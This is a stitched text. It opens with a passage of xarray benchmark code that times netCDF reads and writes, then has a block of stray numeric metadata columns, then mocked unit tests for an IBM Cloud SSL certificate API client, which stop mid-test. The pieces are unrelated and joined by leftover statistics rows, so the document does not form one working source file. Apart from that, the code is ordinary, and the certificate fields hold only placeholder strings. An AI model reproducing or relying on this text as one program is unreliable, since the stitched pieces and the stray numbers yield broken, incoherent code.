os.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'
class IOSingleNetCDF:
"""
A few examples that benchmark reading/writing a single netCDF file with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self):
# single Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
times = pd.date_range('1970-01-01', periods=self.nt, freq='D')
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
self.ds['foo'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
self.ds['bar'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
self.ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
self.ds.attrs = {'history': 'created for xarray benchmarking'}
self.oinds = {'time': randint(0, self.nt, 120),
'lon': randint(0, self.nx, 20),
'lat': randint(0, self.ny, 10)}
self.vinds = {'time': xr.DataArray(randint(0, self.nt, 120),
dims='x'),
'lon': xr.DataArray(randint(0, self.nx, 120),
dims='x'),
'lat': slice(3, 20)}
class IOWriteSingleNetCDF3(IOSingleNetCDF):
def setup(self):
self.format = 'NETCDF3_64BIT'
self.make_ds()
def time_write_dataset_netcdf4(self):
self.ds.to_netcdf('test_netcdf4_write.nc', engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
self.ds.to_netcdf('test_scipy_write.nc', engine='scipy',
format=self.format)
class IOReadSingleNetCDF4(IOSingleNetCDF):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_dataset(self.filepath, engine='netcdf4').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF3(IOReadSingleNetCDF4):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy(self):
xr.open_dataset(self.filepath, engine='scipy').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF4Dask(IOSingleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_netcdf4_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
class IOReadSingleNetCDF3Dask(IOReadSingleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_scipy_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.time_chunks).load()
class IOMultipleNetCDF:
"""
A few examples that benchmark reading/writing multiple netCDF files with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self, nfiles=10):
# multiple Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.nfiles = nfiles
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
self.time_vars = np.split(
pd.date_range('1970-01-01', periods=self.nt, freq='D'),
self.nfiles)
self.ds_list = []
self.filenames_list = []
for i, times in enumerate(self.time_vars):
ds = xr.Dataset()
nt = len(times)
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
ds['foo'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
ds['bar'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
ds.attrs = {'history': 'created for xarray benchmarking'}
self.ds_list.append(ds)
self.filenames_list.append('test_netcdf_%i.nc' % i)
class IOWriteMultipleNetCDF3(IOMultipleNetCDF):
def setup(self):
self.make_ds()
self.format = 'NETCDF3_64BIT'
def time_write_dataset_netcdf4(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='scipy',
format=self.format)
class IOReadMultipleNetCDF4(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4').load()
def time_open_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4')
class IOReadMultipleNetCDF3(IOReadMultipleNetCDF4):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy').load()
def time_open_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy')
class IOReadMultipleNetCDF4Dask(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_open_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
def time_open_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
class IOReadMultipleNetCDF3Dask(IOReadMultipleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks).load()
def time_open_dataset_scipy_with_block_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks)
def time_open_dataset_scipy_with_time_chunks(self):
with dask.config.set(scheduler="multiprocessing"):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks)
def create_delayed_write():
import dask.array as da
vals = da.random.random(300, chunks=(1,))
ds = xr.Dataset({'vals': (['a'], vals)})
return ds.to_netcdf('file.nc', engine='netcdf4', compute=False)
class IOWriteNetCDFDask:
timeout = 60
repeat = 1
number = 5
def setup(self):
requires_dask()
self.write = create_delayed_write()
def time_write(self):
self.write.compute()
class IOWriteNetCDFDaskDistributed:
def setup(self):
try:
import distributed
except ImportError:
raise NotImplementedError
self.client = distributed.Client()
self.write = create_delayed_write()
def cleanup(self):
self.client.shutdown()
def time_write(self):
self.write.compute()
| 36.603563
| 78
| 0.547733
| 1,745
| 16,435
| 4.955874
| 0.104298
| 0.030759
| 0.047179
| 0.041628
| 0.851411
| 0.831869
| 0.795791
| 0.765957
| 0.750347
| 0.74549
| 0
| 0.018215
| 0.338607
| 16,435
| 448
| 79
| 36.685268
| 0.777369
| 0.011622
| 0
| 0.739264
| 0
| 0
| 0.084547
| 0.00827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165644
| false
| 0.003067
| 0.03681
| 0
| 0.276074
| 0.003067
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e0a96dc5448ea582baf863e9a4ccac71d8386e
| 42,877
|
py
|
Python
|
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | 1
|
2020-07-30T10:39:28.000Z
|
2020-07-30T10:39:28.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
from ibm_cloud_networking_services.ssl_certificate_api_v1 import *
crn = 'testString'
zone_identifier = 'testString'
service = SslCertificateApiV1(
authenticator=NoAuthAuthenticator(),
crn=crn,
zone_identifier=zone_identifier
)
base_url = 'https://api.cis.cloud.ibm.com'
service.set_service_url(base_url)
##############################################################################
# Start of Service: SSLCertificate
##############################################################################
# region
#-----------------------------------------------------------------------------
# Test Class for list_certificates
#-----------------------------------------------------------------------------
class TestListCertificates():
#--------------------------------------------------------
# list_certificates()
#--------------------------------------------------------
@responses.activate
def test_list_certificates_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_correlation_id = 'testString'
# Invoke method
response = service.list_certificates(
x_correlation_id=x_correlation_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_list_certificates_required_params()
#--------------------------------------------------------
@responses.activate
def test_list_certificates_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_certificates()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for order_certificate
#-----------------------------------------------------------------------------
class TestOrderCertificate():
#--------------------------------------------------------
# order_certificate()
#--------------------------------------------------------
@responses.activate
def test_order_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
mock_response = '{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
type = 'dedicated'
hosts = ['example.com']
x_correlation_id = 'testString'
# Invoke method
response = service.order_certificate(
type=type,
hosts=hosts,
x_correlation_id=x_correlation_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['type'] == type
assert req_body['hosts'] == hosts
#--------------------------------------------------------
# test_order_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_order_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
mock_response = '{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.order_certificate()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for delete_certificate
#-----------------------------------------------------------------------------
class TestDeleteCertificate():
#--------------------------------------------------------
# delete_certificate()
#--------------------------------------------------------
@responses.activate
def test_delete_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs/testString'
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
cert_identifier = 'testString'
x_correlation_id = 'testString'
# Invoke method
response = service.delete_certificate(
cert_identifier,
x_correlation_id=x_correlation_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_delete_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_delete_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs/testString'
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
cert_identifier = 'testString'
# Invoke method
response = service.delete_certificate(
cert_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_ssl_setting
#-----------------------------------------------------------------------------
class TestGetSslSetting():
#--------------------------------------------------------
# get_ssl_setting()
#--------------------------------------------------------
@responses.activate
def test_get_ssl_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/ssl'
mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_ssl_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_ssl_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_ssl_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/ssl'
mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_ssl_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_ssl_setting
#-----------------------------------------------------------------------------
class TestChangeSslSetting():
#--------------------------------------------------------
# change_ssl_setting()
#--------------------------------------------------------
@responses.activate
def test_change_ssl_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/ssl'
mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
value = 'off'
# Invoke method
response = service.change_ssl_setting(
value=value,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['value'] == value
#--------------------------------------------------------
# test_change_ssl_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_change_ssl_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/ssl'
mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.change_ssl_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for list_custom_certificates
#-----------------------------------------------------------------------------
class TestListCustomCertificates():
#--------------------------------------------------------
# list_custom_certificates()
#--------------------------------------------------------
@responses.activate
def test_list_custom_certificates_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates'
mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_custom_certificates()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_list_custom_certificates_required_params()
#--------------------------------------------------------
@responses.activate
def test_list_custom_certificates_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates'
mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_custom_certificates()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for upload_custom_certificate
#-----------------------------------------------------------------------------
class TestUploadCustomCertificate():
#--------------------------------------------------------
# upload_custom_certificate()
#--------------------------------------------------------
@responses.activate
def test_upload_custom_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a CustomCertReqGeoRestrictions model
custom_cert_req_geo_restrictions_model = {
'label': 'us'
}
# Set up parameter values
certificate = 'testString'
private_key = 'testString'
bundle_method = 'ubiquitous'
geo_restrictions = custom_cert_req_geo_restrictions_model
# Invoke method
response = service.upload_custom_certificate(
certificate=certificate,
private_key=private_key,
bundle_method=bundle_method,
geo_restrictions=geo_restrictions,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['certificate'] == certificate
assert req_body['private_key'] == private_key
assert req_body['bundle_method'] == bundle_method
assert req_body['geo_restrictions'] == geo_restrictions
#--------------------------------------------------------
# test_upload_custom_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_upload_custom_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.upload_custom_certificate()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_custom_certificate
#-----------------------------------------------------------------------------
class TestGetCustomCertificate():
#--------------------------------------------------------
# get_custom_certificate()
#--------------------------------------------------------
@responses.activate
def test_get_custom_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
custom_cert_id = 'testString'
# Invoke method
response = service.get_custom_certificate(
custom_cert_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_custom_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_custom_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
custom_cert_id = 'testString'
# Invoke method
response = service.get_custom_certificate(
custom_cert_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_custom_certificate
#-----------------------------------------------------------------------------
class TestUpdateCustomCertificate():
#--------------------------------------------------------
# update_custom_certificate()
#--------------------------------------------------------
@responses.activate
def test_update_custom_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a CustomCertReqGeoRestrictions model
custom_cert_req_geo_restrictions_model = {
'label': 'us'
}
# Set up parameter values
custom_cert_id = 'testString'
certificate = 'testString'
private_key = 'testString'
bundle_method = 'ubiquitous'
geo_restrictions = custom_cert_req_geo_restrictions_model
# Invoke method
response = service.update_custom_certificate(
custom_cert_id,
certificate=certificate,
private_key=private_key,
bundle_method=bundle_method,
geo_restrictions=geo_restrictions,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['certificate'] == certificate
assert req_body['private_key'] == private_key
assert req_body['bundle_method'] == bundle_method
assert req_body['geo_restrictions'] == geo_restrictions
#--------------------------------------------------------
# test_update_custom_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_update_custom_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
custom_cert_id = 'testString'
# Invoke method
response = service.update_custom_certificate(
custom_cert_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for delete_custom_certificate
#-----------------------------------------------------------------------------
class TestDeleteCustomCertificate():
#--------------------------------------------------------
# delete_custom_certificate()
#--------------------------------------------------------
@responses.activate
def test_delete_custom_certificate_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
responses.add(responses.DELETE,
url,
status=200)
